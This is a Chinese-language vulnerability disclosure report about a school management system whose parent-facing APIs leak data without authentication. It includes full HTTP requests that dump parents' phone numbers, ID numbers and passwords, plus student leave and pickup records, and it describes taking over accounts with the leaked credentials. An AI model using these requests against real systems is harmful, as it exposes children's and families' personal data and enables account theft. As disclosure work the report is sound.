某中学渗透报告
漏洞报告
一、 漏洞概述
| 描述 | 内容 |
|---|---|
| 标题 | xxx中学管理系统存在信息泄露 |
| 漏洞报送时间 | 2026-1-18 |
| 漏洞单位 | xx中学 |
| 漏洞分类 | 接口未授权 |
| 漏洞类型 | 事件型 |
| 漏洞url | xxx |
| 漏洞等级 | 高危 |
| 作者 | 帆船 |
二、 漏洞说明
存在接口未授权泄露学生家长信息
xxxx/prod-api/parent/auth/list
请求包
GET /prod-api/parent/auth/list?pageNum=1&pageSize=20000 HTTP/1.1
Host: xxxxx

包含大量:手机号,身份证号,和 xx校区,xx通行密码

xxxx系统全用户接管




输入/prod-api/parent/auth/list 接口泄露的手机号,密码
xxxxxx/ 123456



成功接管账号

存在接口未授权泄露学生离校信息
/prod-api/parent/leave/list
请求包
GET /prod-api/parent/leave/list?pageNum=1&pageSize=4000 HTTP/1.1
Host: xxxxx
Connection: keep-alive

存在接口未授权泄露学生信息
/prod-api/parent/pickup/list
请求包
GET /prod-api/parent/pickup/list?pageNum=1&pageSize=100 HTTP/1.1
Host: xxxx

三、 修复建议
1、接口鉴权
2、使用强密码
温馨提示:本文内容仅用于合法授权的安全学习与研究交流,严禁用于未授权渗透测试、漏洞利用或任何违法行为。
涉及企业或平台的未公开漏洞信息,请遵循负责任披露原则,勿公开传播可直接复现的敏感细节。
如存在侵权、错误信息或不当内容,请联系站方处理,我们将及时核实并删除。邮箱:admin@baimaojianghu.com。
